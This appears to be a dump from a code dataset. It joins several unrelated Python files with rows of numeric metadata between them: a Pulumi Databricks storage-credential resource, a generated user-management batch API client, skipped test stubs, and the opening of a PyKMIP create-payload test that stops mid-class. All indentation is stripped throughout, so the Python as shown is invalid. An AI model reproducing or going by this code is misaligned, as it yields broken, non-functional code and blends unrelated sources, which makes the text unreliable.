import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['StorageCredentialArgs', 'StorageCredential']
@pulumi.input_type
class StorageCredentialArgs:
def __init__(__self__, *,
aws_iam_role: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']] = None,
azure_service_principal: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']] = None,
comment: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a StorageCredential resource.
:param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
"""
if aws_iam_role is not None:
pulumi.set(__self__, "aws_iam_role", aws_iam_role)
if azure_service_principal is not None:
pulumi.set(__self__, "azure_service_principal", azure_service_principal)
if comment is not None:
pulumi.set(__self__, "comment", comment)
if metastore_id is not None:
pulumi.set(__self__, "metastore_id", metastore_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="awsIamRole")
def aws_iam_role(self) -> Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]:
return pulumi.get(self, "aws_iam_role")
@aws_iam_role.setter
def aws_iam_role(self, value: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]):
pulumi.set(self, "aws_iam_role", value)
@property
@pulumi.getter(name="azureServicePrincipal")
def azure_service_principal(self) -> Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]:
return pulumi.get(self, "azure_service_principal")
@azure_service_principal.setter
def azure_service_principal(self, value: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]):
pulumi.set(self, "azure_service_principal", value)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "metastore_id")
@metastore_id.setter
def metastore_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metastore_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _StorageCredentialState:
def __init__(__self__, *,
aws_iam_role: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']] = None,
azure_service_principal: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']] = None,
comment: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering StorageCredential resources.
:param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
"""
if aws_iam_role is not None:
pulumi.set(__self__, "aws_iam_role", aws_iam_role)
if azure_service_principal is not None:
pulumi.set(__self__, "azure_service_principal", azure_service_principal)
if comment is not None:
pulumi.set(__self__, "comment", comment)
if metastore_id is not None:
pulumi.set(__self__, "metastore_id", metastore_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="awsIamRole")
def aws_iam_role(self) -> Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]:
return pulumi.get(self, "aws_iam_role")
@aws_iam_role.setter
def aws_iam_role(self, value: Optional[pulumi.Input['StorageCredentialAwsIamRoleArgs']]):
pulumi.set(self, "aws_iam_role", value)
@property
@pulumi.getter(name="azureServicePrincipal")
def azure_service_principal(self) -> Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]:
return pulumi.get(self, "azure_service_principal")
@azure_service_principal.setter
def azure_service_principal(self, value: Optional[pulumi.Input['StorageCredentialAzureServicePrincipalArgs']]):
pulumi.set(self, "azure_service_principal", value)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "metastore_id")
@metastore_id.setter
def metastore_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metastore_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
class StorageCredential(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_iam_role: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAwsIamRoleArgs']]] = None,
azure_service_principal: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAzureServicePrincipalArgs']]] = None,
comment: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
> **Private Preview** This feature is in [Private Preview](https://docs.databricks.com/release-notes/release-types.html). Contact your Databricks representative to request access.
To work with external tables, Unity Catalog introduces two new objects to access and work with external cloud storage:
- `StorageCredential` represents authentication methods to access cloud storage (e.g. an IAM role for Amazon S3 or a service principal for Azure Storage). Storage credentials are access-controlled to determine which users can use the credential.
- ExternalLocation are objects that combine a cloud storage path with a Storage Credential that can be used to access the location.
## Example Usage
For AWS
```python
import pulumi
import pulumi_databricks as databricks
external = databricks.StorageCredential("external",
aws_iam_role=databricks.StorageCredentialAwsIamRoleArgs(
role_arn=aws_iam_role["external_data_access"]["arn"],
),
comment="Managed by TF")
external_creds = databricks.Grants("externalCreds",
storage_credential=external.id,
grants=[databricks.GrantsGrantArgs(
principal="Data Engineers",
privileges=["CREATE TABLE"],
)])
```
For Azure
```python
import pulumi
import pulumi_databricks as databricks
external = databricks.StorageCredential("external",
azure_service_principal=databricks.StorageCredentialAzureServicePrincipalArgs(
directory_id=var["tenant_id"],
application_id=azuread_application["ext_cred"]["application_id"],
client_secret=azuread_application_password["ext_cred"]["value"],
),
comment="Managed by TF")
external_creds = databricks.Grants("externalCreds",
storage_credential=external.id,
grants=[databricks.GrantsGrantArgs(
principal="Data Engineers",
privileges=["CREATE TABLE"],
)])
```
## Import
This resource can be imported by namebash
```sh
$ pulumi import databricks:index/storageCredential:StorageCredential this <name>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[StorageCredentialArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
> **Private Preview** This feature is in [Private Preview](https://docs.databricks.com/release-notes/release-types.html). Contact your Databricks representative to request access.
To work with external tables, Unity Catalog introduces two new objects to access and work with external cloud storage:
- `StorageCredential` represents authentication methods to access cloud storage (e.g. an IAM role for Amazon S3 or a service principal for Azure Storage). Storage credentials are access-controlled to determine which users can use the credential.
- ExternalLocation are objects that combine a cloud storage path with a Storage Credential that can be used to access the location.
## Example Usage
For AWS
```python
import pulumi
import pulumi_databricks as databricks
external = databricks.StorageCredential("external",
aws_iam_role=databricks.StorageCredentialAwsIamRoleArgs(
role_arn=aws_iam_role["external_data_access"]["arn"],
),
comment="Managed by TF")
external_creds = databricks.Grants("externalCreds",
storage_credential=external.id,
grants=[databricks.GrantsGrantArgs(
principal="Data Engineers",
privileges=["CREATE TABLE"],
)])
```
For Azure
```python
import pulumi
import pulumi_databricks as databricks
external = databricks.StorageCredential("external",
azure_service_principal=databricks.StorageCredentialAzureServicePrincipalArgs(
directory_id=var["tenant_id"],
application_id=azuread_application["ext_cred"]["application_id"],
client_secret=azuread_application_password["ext_cred"]["value"],
),
comment="Managed by TF")
external_creds = databricks.Grants("externalCreds",
storage_credential=external.id,
grants=[databricks.GrantsGrantArgs(
principal="Data Engineers",
privileges=["CREATE TABLE"],
)])
```
## Import
This resource can be imported by namebash
```sh
$ pulumi import databricks:index/storageCredential:StorageCredential this <name>
```
:param str resource_name: The name of the resource.
:param StorageCredentialArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(StorageCredentialArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_iam_role: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAwsIamRoleArgs']]] = None,
azure_service_principal: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAzureServicePrincipalArgs']]] = None,
comment: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = StorageCredentialArgs.__new__(StorageCredentialArgs)
__props__.__dict__["aws_iam_role"] = aws_iam_role
__props__.__dict__["azure_service_principal"] = azure_service_principal
__props__.__dict__["comment"] = comment
__props__.__dict__["metastore_id"] = metastore_id
__props__.__dict__["name"] = name
super(StorageCredential, __self__).__init__(
'databricks:index/storageCredential:StorageCredential',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
aws_iam_role: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAwsIamRoleArgs']]] = None,
azure_service_principal: Optional[pulumi.Input[pulumi.InputType['StorageCredentialAzureServicePrincipalArgs']]] = None,
comment: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None) -> 'StorageCredential':
"""
Get an existing StorageCredential resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _StorageCredentialState.__new__(_StorageCredentialState)
__props__.__dict__["aws_iam_role"] = aws_iam_role
__props__.__dict__["azure_service_principal"] = azure_service_principal
__props__.__dict__["comment"] = comment
__props__.__dict__["metastore_id"] = metastore_id
__props__.__dict__["name"] = name
return StorageCredential(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="awsIamRole")
def aws_iam_role(self) -> pulumi.Output[Optional['outputs.StorageCredentialAwsIamRole']]:
return pulumi.get(self, "aws_iam_role")
@property
@pulumi.getter(name="azureServicePrincipal")
def azure_service_principal(self) -> pulumi.Output[Optional['outputs.StorageCredentialAzureServicePrincipal']]:
return pulumi.get(self, "azure_service_principal")
@property
@pulumi.getter
def comment(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "comment")
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "metastore_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of Storage Credentials, which must be unique within the databricks_metastore. Change forces creation of a new resource.
"""
return pulumi.get(self, "name")
| 44.025381
| 253
| 0.665571
| 1,847
| 17,346
| 6.002707
| 0.118029
| 0.052584
| 0.077117
| 0.053576
| 0.836114
| 0.818707
| 0.810228
| 0.793903
| 0.789303
| 0.784522
| 0
| 0.000228
| 0.239767
| 17,346
| 393
| 254
| 44.137405
| 0.840525
| 0.344172
| 0
| 0.769608
| 1
| 0
| 0.158715
| 0.103982
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156863
| false
| 0.004902
| 0.034314
| 0.058824
| 0.284314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e604ec1b539491c043721f298b5423f056c91a7e
| 15,635
|
py
|
Python
|
src/sdk/bkuser_sdk/api/batch_api.py
|
shabbywu/bk-user
|
8ea590958a5c6dd3c71d0b72e1d4866ce327efda
|
[
"MIT"
] | null | null | null |
src/sdk/bkuser_sdk/api/batch_api.py
|
shabbywu/bk-user
|
8ea590958a5c6dd3c71d0b72e1d4866ce327efda
|
[
"MIT"
] | null | null | null |
src/sdk/bkuser_sdk/api/batch_api.py
|
shabbywu/bk-user
|
8ea590958a5c6dd3c71d0b72e1d4866ce327efda
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
蓝鲸用户管理 API
蓝鲸用户管理后台服务 API # noqa: E501
OpenAPI spec version: v2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bkuser_sdk.api_client import ApiClient
class BatchApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v2_batch_departments_multiple_retrieve_profiles(self, department_ids, **kwargs): # noqa: E501
"""v2_batch_departments_multiple_retrieve_profiles # noqa: E501
批量获取组织的用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_departments_multiple_retrieve_profiles(department_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str department_ids: department id 列表,以 , 分隔 (required)
:param bool recursive:
:return: list[Profile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v2_batch_departments_multiple_retrieve_profiles_with_http_info(department_ids, **kwargs) # noqa: E501
else:
(data) = self.v2_batch_departments_multiple_retrieve_profiles_with_http_info(department_ids, **kwargs) # noqa: E501
return data
def v2_batch_departments_multiple_retrieve_profiles_with_http_info(self, department_ids, **kwargs): # noqa: E501
"""v2_batch_departments_multiple_retrieve_profiles # noqa: E501
批量获取组织的用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_departments_multiple_retrieve_profiles_with_http_info(department_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str department_ids: department id 列表,以 , 分隔 (required)
:param bool recursive:
:return: list[Profile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['department_ids', 'recursive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_batch_departments_multiple_retrieve_profiles" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'department_ids' is set
if ('department_ids' not in params or
params['department_ids'] is None):
raise ValueError("Missing the required parameter `department_ids` when calling `v2_batch_departments_multiple_retrieve_profiles`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'department_ids' in params:
query_params.append(('department_ids', params['department_ids'])) # noqa: E501
if 'recursive' in params:
query_params.append(('recursive', params['recursive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v2/batch/departments/profiles/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Profile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_batch_profiles_delete(self, body, **kwargs): # noqa: E501
"""v2_batch_profiles_delete # noqa: E501
批量删除用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_profiles_delete(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UpdateProfile] body: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v2_batch_profiles_delete_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.v2_batch_profiles_delete_with_http_info(body, **kwargs) # noqa: E501
return data
def v2_batch_profiles_delete_with_http_info(self, body, **kwargs): # noqa: E501
"""v2_batch_profiles_delete # noqa: E501
批量删除用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_profiles_delete_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UpdateProfile] body: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_batch_profiles_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `v2_batch_profiles_delete`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v2/batch/profiles/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_batch_profiles_partial_update(self, body, **kwargs): # noqa: E501
"""v2_batch_profiles_partial_update # noqa: E501
批量更新用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_profiles_partial_update(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UpdateProfile] body: (required)
:return: list[Profile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v2_batch_profiles_partial_update_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.v2_batch_profiles_partial_update_with_http_info(body, **kwargs) # noqa: E501
return data
def v2_batch_profiles_partial_update_with_http_info(self, body, **kwargs): # noqa: E501
"""v2_batch_profiles_partial_update # noqa: E501
批量更新用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_profiles_partial_update_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UpdateProfile] body: (required)
:return: list[Profile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_batch_profiles_partial_update" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `v2_batch_profiles_partial_update`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v2/batch/profiles/', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Profile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_batch_profiles_read(self, **kwargs): # noqa: E501
"""v2_batch_profiles_read # noqa: E501
批量获取用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_profiles_read(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[Profile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v2_batch_profiles_read_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.v2_batch_profiles_read_with_http_info(**kwargs) # noqa: E501
return data
def v2_batch_profiles_read_with_http_info(self, **kwargs): # noqa: E501
"""v2_batch_profiles_read # noqa: E501
批量获取用户 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_batch_profiles_read_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[Profile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_batch_profiles_read" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v2/batch/profiles/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Profile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.404306
| 156
| 0.614775
| 1,784
| 15,635
| 5.091368
| 0.093049
| 0.051084
| 0.052846
| 0.031708
| 0.935484
| 0.921832
| 0.915887
| 0.894088
| 0.875372
| 0.865463
| 0
| 0.020353
| 0.296067
| 15,635
| 417
| 157
| 37.494005
| 0.804925
| 0.316214
| 0
| 0.775229
| 1
| 0
| 0.177087
| 0.061198
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041284
| false
| 0
| 0.018349
| 0
| 0.119266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e61c4459cfe0fdfe7f52be822844f6a533a766b8
| 436
|
py
|
Python
|
tests/unit/test_utils.py
|
cschreep/dug
|
f61f0248caa8a5b6b4f25f6d1a8f8f1afd28a39e
|
[
"MIT"
] | null | null | null |
tests/unit/test_utils.py
|
cschreep/dug
|
f61f0248caa8a5b6b4f25f6d1a8f8f1afd28a39e
|
[
"MIT"
] | null | null | null |
tests/unit/test_utils.py
|
cschreep/dug
|
f61f0248caa8a5b6b4f25f6d1a8f8f1afd28a39e
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.mark.skip("Implement this test")
def test_object_factory():
pass
@pytest.mark.skip("Implement this test")
def test_complex_handler():
pass
@pytest.mark.skip("Implement this test")
def test_get_dbgap_var_link():
pass
@pytest.mark.skip("Implement this test")
def test_get_dbgap_study_link():
pass
@pytest.mark.skip("Implement this test")
def test_parse_study_name_from_filename():
pass
| 16.148148
| 42
| 0.743119
| 64
| 436
| 4.796875
| 0.34375
| 0.162866
| 0.228013
| 0.374593
| 0.749186
| 0.749186
| 0.749186
| 0.749186
| 0.625407
| 0.488599
| 0
| 0
| 0.142202
| 436
| 26
| 43
| 16.769231
| 0.820856
| 0
| 0
| 0.625
| 0
| 0
| 0.21789
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3125
| true
| 0.3125
| 0.0625
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e62044bbd93dfa9af9265d845ec02b7a2ce22502
| 70,924
|
py
|
Python
|
kmip/tests/unit/core/messages/payloads/test_create.py
|
ondrap/PyKMIP
|
c8ea17d8faf827e0f9d004972835128a1a71569f
|
[
"Apache-2.0"
] | 179
|
2015-03-20T06:08:59.000Z
|
2022-03-14T02:24:38.000Z
|
kmip/tests/unit/core/messages/payloads/test_create.py
|
imharshr/PyKMIP
|
9403ff3d2aa83de4c786b8eedeb85d169fd4a594
|
[
"Apache-2.0"
] | 600
|
2015-04-08T14:14:48.000Z
|
2022-03-28T13:49:47.000Z
|
kmip/tests/unit/core/messages/payloads/test_create.py
|
imharshr/PyKMIP
|
9403ff3d2aa83de4c786b8eedeb85d169fd4a594
|
[
"Apache-2.0"
] | 131
|
2015-03-30T12:51:49.000Z
|
2022-03-23T04:34:34.000Z
|
# Copyright (c) 2014 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from kmip.core import enums
from kmip.core import exceptions
from kmip.core import objects
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages import payloads
class TestCreateRequestPayload(testtools.TestCase):
def setUp(self):
super(TestCreateRequestPayload, self).setUp()
# Encoding obtained from the KMIP 1.1 testing document,
# Section 3.1.1.
#
# This encoding matches the following set of values:
# Request Payload
# Object Type - Symmetric Key
# Template Attribute
# Attribute
# Attribute Name - Cryptographic Algorithm
# Attribute Value - AES
# Attribute
# Attribute Name - Cryptographic Length
# Attribute Value - 128
# Attribute
# Attribute Name - Cryptographic Usage Mask
# Attribute Value - Encrypt | Decrypt
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\xC0'
b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
b'\x42\x00\x91\x01\x00\x00\x00\xA8'
b'\x42\x00\x08\x01\x00\x00\x00\x30'
b'\x42\x00\x0A\x07\x00\x00\x00\x17'
b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x41\x6C'
b'\x67\x6F\x72\x69\x74\x68\x6D\x00'
b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
b'\x42\x00\x08\x01\x00\x00\x00\x30'
b'\x42\x00\x0A\x07\x00\x00\x00\x14'
b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x4C\x65'
b'\x6E\x67\x74\x68\x00\x00\x00\x00'
b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00'
b'\x42\x00\x08\x01\x00\x00\x00\x30'
b'\x42\x00\x0A\x07\x00\x00\x00\x18'
b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x55\x73'
b'\x61\x67\x65\x20\x4D\x61\x73\x6B'
b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x0C\x00\x00\x00\x00'
)
# Encoding obtained from the KMIP 1.1 testing document,
# Section 3.1.1, and manually converted into KMIP 2.0 format.
#
# This encoding matches the following set of values:
# Request Payload
# Object Type - Symmetric Key
# Attributes
# Cryptographic Algorithm - AES
# Cryptographic Length - 128
# Cryptographic Usage Mask - Encrypt | Decrypt
# Protection Storage Masks
# Protection Storage Mask - Software | Hardware
